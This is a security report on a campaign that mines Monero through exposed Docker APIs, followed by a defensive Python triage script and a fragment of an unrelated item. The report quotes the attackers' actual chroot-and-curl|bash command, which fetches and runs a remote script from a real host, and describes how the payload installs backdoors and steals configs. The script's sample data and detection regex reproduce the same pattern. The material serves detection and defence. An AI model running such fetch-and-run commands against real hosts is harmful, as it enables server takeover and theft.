A currently unidentified group is mass-scanning the internet attempting to discover Linux servers running Docker platforms that have their API endpoints exposed. The group is using the vulnerable endpoints to mine Monero digital currency. They are currently scanning more than 59,000 netblocks attempting to discover exposed Docker instances. Once a vulnerable instance has been identified, the group runs the command `chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'`, which downloads and runs a Bash script from the attacker's server. The script then installs an XMRig crypto-currency miner. In the two days that the campaign has been active, it appears that the hackers have already mined 14.82 Monero coins (XMR), which is approximately $740 USD. The group uninstalls known monitoring agents on the exposed Docker instances and kills a number of other processes. This includes shutting down not only security products but also processes associated with rival mining botnets. The script being run by the group also scans the infected host for config files, which it then both encrypts and steals, installs backdoor accounts and leaves behind SSH keys for easier access to the infected host by the attackers.
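The `chroot /mnt` step in the command above only works because the container was started with the host's root filesystem mounted at `/mnt`, which an unauthenticated TCP listener on the Docker API allows anyone to request. The following triage script is an added example, not part of the original report: it checks a `daemon.json` for TCP listeners without TLS verification and scans `docker inspect` records for the host-root bind mount, privileged flag and chroot-plus-`curl | bash` command pattern. The daemon config, inspect records and the placeholder download URL are constructed inline so it runs offline.

```python
"""Defender-side triage of a Docker host for the exposed-API mining pattern.

Assumptions (not from the original report): input is the daemon's daemon.json
and `docker inspect` output; both are constructed inline so this runs offline.
"""
import re
from typing import Iterable

# Command shape seen in the campaign: chroot into a host mount, then curl | bash.
CHROOT_PIPE_TO_SHELL = re.compile(r"chroot\s+\S+.*curl\b.*\|\s*(ba)?sh", re.S)


def exposed_tcp_listeners(daemon_config: dict) -> list:
    """Return TCP API listeners that are not protected by TLS client verification."""
    hosts = daemon_config.get("hosts", [])
    tls_verify = daemon_config.get("tlsverify", False)
    return [h for h in hosts if h.startswith("tcp://") and not tls_verify]


def container_findings(inspect_records: Iterable[dict]) -> dict:
    """Map container name -> reasons it matches the intrusion pattern (empty if none)."""
    findings = {}
    for rec in inspect_records:
        reasons = []
        host_cfg = rec.get("HostConfig", {})
        # Host root bind-mounted into the container: what makes `chroot /mnt` work.
        for bind in host_cfg.get("Binds", []) or []:
            parts = bind.split(":")
            if parts[0] == "/":
                reasons.append("host root bind-mounted at %s" % parts[1])
        if host_cfg.get("Privileged"):
            reasons.append("privileged container")
        cmd = " ".join(rec.get("Config", {}).get("Cmd") or [])
        if CHROOT_PIPE_TO_SHELL.search(cmd):
            reasons.append("chroot + curl|bash in command")
        if reasons:
            findings[rec["Name"].lstrip("/")] = reasons
    return findings


# Constructed sample data: one benign web container, one matching the campaign.
SAMPLE_DAEMON_JSON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
SAMPLE_INSPECT = [
    {"Name": "/web", "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
     "Config": {"Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Name": "/xyz", "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
     "Config": {"Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                        "curl -sL4 http://PLACEHOLDER.invalid/x | bash;"]}},
]

if __name__ == "__main__":
    print("exposed listeners:", exposed_tcp_listeners(SAMPLE_DAEMON_JSON))
    for name, why in container_findings(SAMPLE_INSPECT).items():
        print(name, why)
```

On a live host, replace the samples with the parsed `/etc/docker/daemon.json` and the output of `docker inspect $(docker ps -aq)`.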
Binary Defense was contacted by an individual who was recently scammed out of $4,000 through